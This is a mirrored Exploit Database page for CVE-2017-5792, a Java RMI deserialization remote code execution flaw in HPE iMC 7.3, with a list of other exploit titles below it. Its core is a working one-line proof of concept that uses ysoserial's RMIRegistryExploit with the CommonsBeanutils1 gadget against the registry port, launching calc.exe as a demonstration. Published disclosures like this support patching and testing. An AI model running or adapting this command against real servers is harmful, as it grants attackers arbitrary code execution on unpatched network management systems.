HPE iMC 7.3 – RMI Java Deserialization

Exploit Database
39 阅读

作者： Chris Lyne

日期： 2018-01-30
类别：
- remote
平台：
- windows
来源：https://www.exploit-db.com/exploits/43927/

# Exploit Title: HPE iMC 7.3 Java RMI Registry Deserialization RCE Vulnerability
# Date: 01-28-2018
# Exploit Author: Chris Lyne (@lynerc)
# Vendor Homepage: www.hpe.com
# Software Link: https://h10145.www1.hpe.com/Downloads/DownloadSoftware.aspx?SoftwareReleaseUId=19068&ProductNumber=JG747AAE&lang=en&cc=us&prodSeriesId=4176535&SaidNumber=
# Version: iMC PLAT v7.3 (E0504) Standard
# Tested on: Windows Server 2008 R2 Enterprise 64-bit
# CVE : CVE-2017-5792
# See Also: http://zerodayinitiative.com/advisories/ZDI-18-137/

# note that this PoC will launch calc.exe

$ java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit 192.168.1.100 21195 CommonsBeanutils1 calc.exe

last Exploits
HPE iMC 7.3 – RMI Java Deserialization的更多信息

Unitrends UEB 9.1 – ‘Unitrends bpserverd’ Remote Command Execution：
libxml2 2.6.x – ‘XMLWriter::writeAttribute()’ Memory Leak Information Disclosure：
WordPress Plugin InfusionSoft – Arbitrary File Upload (Metasploit)：
Microsoft Outlook – ‘ATTACH_BY_REF_ONLY’ File Execution (MS10-045) (Metasploit)：
Vivotek IP Cameras – Remote Stack Overflow (PoC)：
Dup Scout Enterprise – ‘Login’ Buffer Overflow (Metasploit)：
EyesOfNetwork – AutoDiscovery Target Command Execution (Metasploit)：
KevinLAB BEMS 1.0 – Undocumented Backdoor Account：